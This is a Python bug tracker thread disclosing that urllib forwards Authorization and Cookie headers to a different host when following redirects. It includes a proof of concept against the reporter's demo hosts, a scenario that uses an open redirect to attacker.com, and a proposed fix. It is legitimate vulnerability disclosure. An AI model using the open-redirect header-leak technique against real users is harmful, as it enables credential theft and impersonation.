classification
Title: urllib may leak sensitive HTTP headers to a third-party web site
Type: security Stage: patch review
Components: Library (Lib) Versions: Python 3.5
process
Status: open Resolution:
Dependencies: Superseder:
Assigned To: Nosy List: Ivan.Pozdeev, alex, artem.smotrakov, eamanu, jwilk, kyoshidajp, martin.panter, orsenthil, xtreak
Priority: normal Keywords: patch

Created on 2018-05-27 14:20 by artem.smotrakov, last changed 2018-12-29 15:02 by kyoshidajp.

Pull Requests
URL Status Linked Edit
PR 11292 open kyoshidajp, 2018-12-23 02:03
Messages (10)
msg317793 - (view) Author: Artem Smotrakov (artem.smotrakov) * Date: 2018-05-27 14:20
After discussing it on security@python.org, it was decided to disclose it. Here is the original report:




Hello Python Security Team,

Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects.

Let's consider the following environment:
- http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via basic HTTP authentication scheme
- http://httpleak.gypsyengineer.com/redirect.php?url=<url> is an open redirect which returns 301 code, and redirects a client to the specified URL
- http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent

Let's then consider the following scenario:
- create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com'
- call urllib.request.Request.add_header() method to set Authorization and Cookie headers
- call urllib.request.urlopen() method to open a connection

Here is what happens next:
- urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected
- redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
- urllib processes 301 code and makes a request to http://headers.gypsyengineer.com

The problem is that urllib sends the Authorization and Cookie headers to http://headers.gypsyengineer.com as well.

Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), 
and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php
If an attacker can trick the user into opening http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com,
then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them.
As a result, the attacker can impersonate the user on the original web site.

Here is a simple POC which shows the problem:

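import urllib.request

# Open redirect on the first host, pointing at a second, unrelated host
req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
# Credentials intended only for httpleak.gypsyengineer.com
req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com')
# urlopen() follows the 301 automatically; print what the second host received
with urllib.request.urlopen(req) as f:
    print(f.read(2048).decode("utf-8"))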


Running this code loads http://headers.gypsyengineer.com, which prints out the Authorization and Cookie headers
that are supposed to be sent only to httpleak.gypsyengineer.com:

Hello, I am <b>headers.gypsyengineer.com</b></br></br>
Here are HTTP headers you just sent me:</br></br>
Accept-Encoding: identity</br>
User-Agent: Python-urllib/3.8</br>
<b>Authorization: Basic YWRtaW46dGVzdA==</br></b>
<b>Cookie: This is only for httpleak.gypsyengineer.com</br></b>
Host: headers.gypsyengineer.com</br>
Cache-Control: max-age=259200</br>
Connection: keep-alive</br>


I could reproduce it with 3.5.2 and the latest build of https://github.com/python/cpython
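
To check a given interpreter without contacting the demo hosts, the redirect step can be exercised offline. The sketch below is only an illustration: the helper name headers_after_redirect and the a.example / b.example hosts are assumptions made for this example, and it calls HTTPRedirectHandler.redirect_request directly instead of going through urlopen(). What it prints depends on the Python version in use.

```python
import urllib.request


def headers_after_redirect(url, new_url, headers, code=301):
    """Return the headers urllib would attach to the follow-up request.

    Hypothetical helper: it builds the original request and asks the
    stock redirect handler for the request it would issue next.
    """
    req = urllib.request.Request(url, headers=headers)
    handler = urllib.request.HTTPRedirectHandler()
    # fp and the response headers are only used on the error path, so
    # placeholders (None and an empty dict) are enough for a GET + 301.
    new_req = handler.redirect_request(req, None, code, "Moved", {}, new_url)
    return dict(new_req.header_items())


if __name__ == "__main__":
    # Hypothetical hosts; no network traffic is generated.
    forwarded = headers_after_redirect(
        "http://a.example/redirect",
        "http://b.example/",
        {"Authorization": "Basic YWRtaW46dGVzdA==", "Cookie": "only-for-a"},
    )
    print(forwarded)
```

If Authorization or Cookie appear in the printed dictionary, that interpreter forwards them across hosts.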

If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.

Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks!

Artem
msg317818 - (view) Author: Ivan Pozdeev (Ivan.Pozdeev) * Date: 2018-05-28 00:11
According to https://stackoverflow.com/questions/1969709/how-to-forward-headers-on-http-redirect , there's nothing in the specs that mentions (even the possibility of) any special request header processing.

According to https://tools.ietf.org/html/rfc7231#section-6.4 , redirection targets are to be treated as effectively equal to the original URL.

So, there aren't any grounds for the proposed filtering from web standards' POV.


Neither are there any from a security POV:
once you have given your credentials to a server, it is free to do whatever it wants with them. So, by giving them, you have effectively put down your signature that you trust the server with your data -- which implies trusting its advice where to resend it.
The server could just as well do the resending itself and pass you the end result. So, your proposed filtering does not actually achieve anything meaningful.
msg317824 - (view) Author: Artem Smotrakov (artem.smotrakov) * Date: 2018-05-28 06:28
Hi Ivan,

Yes, unfortunately specs don't say anything about this scenario.

> once you have given your credentials to a server, it is free to do whatever it wants with them. 

I hope servers don't share this opinion :)

> So, your proposed filtering does not actually achieve anything meaningful.

I am sorry that I couldn't convince you. Thank you for your reply!
msg318453 - (view) Author: Ivan Pozdeev (Ivan.Pozdeev) * Date: 2018-06-01 18:52
It's not about "convincing" me or anyone else. It's about showing how this will be a strict improvement.

I showed that the HTTP RFC allows apps to rely on the fact that they are receiving all the headers. So filtering them arbitrarily violates the HTTP standard -- while the whole purpose of `urllib` is to conform to it (or it would not be able to reliably talk to HTTP servers).

So, your suggestion is a disaster rather than improvement.
msg319880 - (view) Author: Artem Smotrakov (artem.smotrakov) * Date: 2018-06-18 13:04
If I am not missing something, section 6.4 of RFC 7231 doesn't explicitly say that all headers should be sent. I wish it did :)

I think that an Authorization header for host A may make sense for host B if both A and B use the same database with user credentials. I am not sure that modern authentication mechanisms like OAuth rely on this fact (although I need to check the specs to make sure).

Sending a Cookie header to a different domain looks like a violation of the same-origin policy to me. RFC 6265 says something about it

https://tools.ietf.org/html/rfc6265#section-5.4

curl was recently updated to filter out Authorization headers in case of a redirect to another host. Chrome and Firefox don't send either Authorization or Cookie headers while handling a redirect. It doesn't seem to be a disaster for them :)
msg332381 - (view) Author: Katsuhiko YOSHIDA (kyoshidajp) * Date: 2018-12-23 02:03
Hi,

I agree with this suggestion.

First, section 6.4. "Redirection 3xx" of RFC 7231 doesn't explicitly explain whether to send all headers (including Authorization).

I have confirmed that the following third-party libraries, tools, programming languages and web browsers do NOT forward the Authorization header on redirect.

- urllib3 (after 1.23, PR: https://github.com/urllib3/urllib3/pull/1346)
- curl (after 7.58.0, ref: https://curl.haxx.se/docs/CVE-2018-1000007.html)
- net/http package of Golang (ref: https://github.com/golang/go/blob/release-branch.go1.11/src/net/http/client.go#L41-L46)
- Safari Version 12.0.2 (13606.3.4.1.4)
- Google Chrome Version 71.0.3578.98 (Official Build) (64-bit)

In other words, these err on the safe side.

Actually, HTTPBasicAuthHandler of urllib2 doesn't forward the Authorization header on redirect. If this suggestion is rejected, I think that HTTPBasicAuthHandler should be changed for consistency.
msg332408 - (view) Author: Emmanuel Arias (eamanu) * Date: 2018-12-24 05:30
Hi!

As Katsuhiko YOSHIDA says (https://github.com/python/cpython/pull/11292#issuecomment-449667371), this should filter other sensitive headers too. I think that is reasonable if we want a complete solution to this issue.

Maybe this fix could be applied to versions 3.5+?
msg332561 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2018-12-26 20:45
Are you aware of the “add_unredirected_header” method? Maybe that is enough to avoid your problem.
https://docs.python.org/dev/library/urllib.request.html#urllib.request.Request.add_unredirected_header
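
A minimal sketch of how add_unredirected_header behaves, assuming hypothetical hosts a.example and b.example. It calls HTTPRedirectHandler.redirect_request directly so nothing is sent over the network; the None and {} arguments are placeholders for the response object and response headers, which are not needed for a GET with a 301.

```python
import urllib.request

# Hypothetical URL; no connection is opened in this sketch.
req = urllib.request.Request("http://a.example/start")

# Stored separately from the regular headers and not copied to the
# request that urllib builds when it follows a redirect.
req.add_unredirected_header("Authorization", "Basic YWRtaW46dGVzdA==")

# A regular header, for comparison.
req.add_header("Accept", "text/html")

handler = urllib.request.HTTPRedirectHandler()
follow_up = handler.redirect_request(
    req, None, 301, "Moved", {}, "http://b.example/"
)

print("original: ", req.header_items())
print("follow-up:", follow_up.header_items())
```

Note that a header added this way is dropped on every redirect, including a redirect that stays on the same host.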
msg332571 - (view) Author: Katsuhiko YOSHIDA (kyoshidajp) * Date: 2018-12-27 00:56
Thanks. But I think “add_unredirected_header” is not enough.

For security, these sensitive headers should be removed only when automatically redirecting to a different site, as HTTPBasicAuthHandler of urllib2 does. To fulfill this requirement, I think the operation should be in HTTPRedirectHandler.redirect_request.
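
As a rough illustration of that idea (not the code from PR 11292), a handler subclass could strip the headers only when the host changes. The class name, the SENSITIVE_HEADERS set and the example hosts below are assumptions made for this sketch, and comparing hostnames alone is a simplification that ignores scheme and port.

```python
import urllib.request
from urllib.parse import urlsplit

# Assumed set of headers to strip; names are compared case-insensitively.
SENSITIVE_HEADERS = frozenset({"authorization", "cookie"})


class CrossHostStrippingRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Hypothetical handler: drop sensitive headers on cross-host redirects."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        new_req = super().redirect_request(req, fp, code, msg, headers, newurl)
        if new_req is None:
            return None
        old_host = urlsplit(req.full_url).hostname
        new_host = urlsplit(new_req.full_url).hostname
        if old_host != new_host:
            # Copy the keys first because remove_header mutates the dict.
            for name in list(new_req.headers):
                if name.lower() in SENSITIVE_HEADERS:
                    new_req.remove_header(name)
        return new_req


# Passing an instance to build_opener replaces the default redirect handler.
opener = urllib.request.build_opener(CrossHostStrippingRedirectHandler())
```

Requests made through opener.open() would then keep Authorization and Cookie on same-host redirects and lose them when the redirect target is another host.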
msg332719 - (view) Author: Katsuhiko YOSHIDA (kyoshidajp) * Date: 2018-12-29 15:02
According to RFC 7235 (https://tools.ietf.org/html/rfc7235#section-4.1), the WWW-Authenticate header is sent from server to client, and it carries no credential data.

Also, the Cookie2 header has already been obsoleted by RFC 6265 (https://tools.ietf.org/html/rfc6265).

So, I think that filtering both "Authorization" and "Cookie" is enough.
History
Date User Action Args
2018-12-29 15:02:19 kyoshidajp set messages: + msg332719
2018-12-27 00:56:30 kyoshidajp set messages: + msg332571
2018-12-26 20:45:20 martin.panter set nosy: + martin.panter
messages: + msg332561
title: urllib may leak sensitive HTTP headers to a third-party web site1111 -> urllib may leak sensitive HTTP headers to a third-party web site
2018-12-25 06:00:42 shuoz set title: urllib may leak sensitive HTTP headers to a third-party web site -> urllib may leak sensitive HTTP headers to a third-party web site1111
2018-12-24 05:30:27 eamanu set nosy: + eamanu
messages: + msg332408
2018-12-23 05:39:34 xtreak set nosy: + xtreak
2018-12-23 02:03:56 kyoshidajp set nosy: + kyoshidajp
messages: + msg332381
pull_requests: + pull_request10522
keywords: + patch
stage: patch review
2018-06-18 13:04:05 artem.smotrakov set messages: + msg319880
2018-06-01 18:52:51 Ivan.Pozdeev set messages: + msg318453
2018-06-01 17:03:44 jwilk set nosy: + jwilk
2018-05-28 06:28:26 artem.smotrakov set messages: + msg317824
2018-05-28 00:11:20 Ivan.Pozdeev set nosy: + Ivan.Pozdeev
messages: + msg317818
2018-05-27 14:21:00 alex set nosy: + orsenthil
2018-05-27 14:20:06 artem.smotrakov create